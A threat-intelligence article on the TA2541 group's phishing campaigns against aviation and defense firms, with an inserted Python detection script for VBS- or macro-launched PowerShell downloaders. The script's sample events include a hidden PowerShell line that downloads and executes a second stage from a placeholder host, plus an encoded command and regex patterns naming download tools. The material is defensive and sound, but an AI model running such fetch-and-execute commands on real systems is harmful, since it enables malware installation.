A cyber-criminal group tracked by Proofpoint as TA2541, whose identity and location remain unknown, is targeting organizations in the aviation, aerospace, defense, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years.  The group, now detailed by cybersecurity researchers, has been active since 2017 and has compromised hundreds of organizations across North America, Europe, and the Middle East.

Despite operating for nearly five years, the attacks have barely evolved: the group follows the same targeting and lure themes, remotely controls compromised machines, conducts reconnaissance on the network and steals sensitive data.

"What's noteworthy about TA2541 is how little they've changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans," said Proofpoint's vice president of threat research and detection.[1]  "This group is a persistent threat to targets throughout the transportation, logistics, and travel industries."

Attacks begin with phishing emails designed to be relevant to individuals and businesses in the targeted sectors.  One lure email sent to targets in aviation and aerospace resembles a request for aircraft parts, while another is designed to look like an urgent request for air ambulance flight details.  At one point the attackers introduced COVID-19-themed lures, although these were soon dropped.  While the lures are not highly customized and follow regular templates, the sheer number of messages sent over the years, estimated in the hundreds of thousands in total, combined with their implied urgency, is enough to fool some recipients into downloading malware.  The messages are nearly always in English.[2]

TA2541 initially sent emails containing macro-laden Microsoft Word attachments that downloaded the Remote Access Trojan (RAT) payload, but the group has recently shifted to using Google Drive and Microsoft OneDrive URLs that lead to an obfuscated Visual Basic Script (VBS) file.  Opening one of these files, whose names follow the same themes as the initial lures, causes the script to invoke PowerShell to download the malware onto the Windows machine.
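The execution chain described above (a lure script run by the Windows Script Host, or an Office macro, that launches PowerShell as a downloader) is what endpoint telemetry should be watched for. The following is an added detection example, not code from the original article or from Proofpoint: it classifies process-creation events shaped like Sysmon Event ID 1 records. The field names, command-line cues and sample events are constructed assumptions for illustration, not real telemetry or indicators from the campaign.

```python
"""
Added example (not from the original article or Proofpoint): flag the
"script host -> PowerShell downloader" chain described in the text.
The ProcessEvent fields mirror Sysmon Event ID 1 (process creation);
all sample events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # run the lure .vbs
OFFICE_HOSTS = {"winword.exe", "excel.exe"}     # run the earlier macro lures
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of PowerShell used as a downloader ...
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
# ... or launched with a hidden / encoded / policy-bypassing command line.
EVASION_CUES = re.compile(
    r"-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|-nop\b|bypass",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a detection label for the event, or None if it looks benign."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if child not in POWERSHELL:
        return None
    downloader = bool(DOWNLOAD_CUES.search(ev.command_line))
    evasive = bool(EVASION_CUES.search(ev.command_line))
    if parent in SCRIPT_HOSTS and (downloader or evasive):
        return "vbs-to-powershell-downloader"
    if parent in OFFICE_HOSTS and (downloader or evasive):
        return "office-macro-to-powershell-downloader"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Index and label of every event that matches a detection."""
    return [(i, label) for i, ev in enumerate(events) if (label := classify(ev))]


# Constructed sample events (hypothetical hosts, paths and URLs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: lure VBS run by wscript.exe pulls a second stage with PowerShell
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS,
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage2.txt')\""),
    # 1: macro-era chain, Word spawning hidden/encoded PowerShell
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
                 "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    # 2: interactive admin use from Explorer, benign
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell.exe Get-ChildItem C:\\Users"),
    # 3: logon script calling a local .ps1 with no download or evasion cues
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS,
                 "powershell.exe -File C:\\Scripts\\inventory.ps1"),
    # 4: the script host itself being started is not what this rule targets
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\wscript.exe",
                 "wscript.exe C:\\Users\\u\\Downloads\\Aircraft_Parts_Request.vbs"),
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

Event 3 shows the main tuning point: a script host launching PowerShell is common in managed environments, so the rule requires a download or evasion cue in addition to the parent-child relationship, at the cost of missing a VBS that runs a plain `-File` with a benign-looking name.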

The cyber criminals have distributed over a dozen different trojan malware payloads since the campaigns began, all of which can be bought on dark web forums or downloaded from open-source repositories.  Currently, the most commonly delivered malware in TA2541 campaigns is AsyncRAT, but other popular payloads include NetWire, WSH RAT and Parallax.

No matter which malware is delivered, it is used to gain remote control of infected machines and steal data, although researchers note that they still do not know the group's ultimate goal or where it operates from.  The campaign is still active around the world.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization that has long collected and analyzed cyber indicators.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989

[1] https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

[2] https://www.zdnet.com/article/these-prolific-hackers-have-been-targeting-the-aerospace-and-defence-industries-with-trojan-malware-for-years/